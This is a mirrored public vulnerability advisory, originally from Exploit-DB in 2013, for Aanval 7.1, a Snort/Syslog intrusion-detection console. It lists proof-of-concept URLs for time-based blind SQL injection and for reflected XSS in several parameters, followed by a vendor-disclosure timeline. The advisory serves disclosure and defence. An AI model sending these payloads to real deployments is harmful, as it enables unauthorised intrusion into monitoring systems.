Aanval 7.1 build 70151 - Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1065238 漏洞类型
发布时间 2013-10-04 更新时间 2013-10-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28723
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-----------
Author:
-----------

xistence < xistence[at]0x90[.]nl >

-------------------------
Affected products:
-------------------------

Aanval 7.1 build 70151

-------------------------
Affected vendors:
-------------------------

Aanval
http://www.aanval.com/
https://www.aanval.com/download/pickup

-------------------------
Product description:
-------------------------

Aanval is the industry's most comprehensive Snort and Syslog Intrusion
Detection, Correlation,
and Threat Management console on the market. Aanval supports both Snort and
Suricata,
as well as virtually any Syslog data source, and is designed specifically
to scale from
small-single sensor installations to global enterprise deployments.

Aanval's primary function is to correlate data from multiple sources, bring
together billions of events,
and present users with a holistic view of false-positive free, network
security situational awareness.

----------
Details:
----------

Aanval 7.1 build 70151 is prone to multiple vulnerabilities. Below are the
details.

[ 0x01 - Blind SQL Injection ]

The "id" and "query" parameters are vulnerable to blind SQL injection. The
proof of concept below does a sha1 benchmark on the value "1". This will
take a couple of seconds to process in most situations and thus shows that
the injection works.
http://
<IP>/aanval/?op=prv_myReports&id=2'%20and%20benchmark(20000000%2csha1(1))--%20
http://
<IP>/aanval/?op=prv_eventSearch&query=%20report:'%2bbenchmark(20000000%2csha1(1))%2b'


[ 0x02 - Reflected XSS ]

The following requests are vulnerable to "Cross Site Scripting" and will
show a pop-up with the word "XSS".

http://<IP>/aanval/?op=prv_eventSearch&dip=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&dport=%0Aalert('XSS')//
http://<IP>/aanval/?num=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&protocol=%0Aalert('XSS')//
http://
<IP>/aanval/?op=prv_eventSearch&query=%20report:31337%0aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&risk=%0Aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&sip=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&sport=%0aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&string=<script>alert('XSS')</script>
http://
<IP>/aanval/?op=prv_eventSearchResults&transaction="><script>alert('XSS')</script>

-----------
Solution:
-----------

No fix available, use a good WAF :)

--------------
Timeline:
--------------

2013-08-16 Provided details to Aanval support. Ticket is created.
2013-09-19 Asked for status update.
2013-09-26 No response yet, asked for status update again.
2013-10-04 Still no response, public disclosure.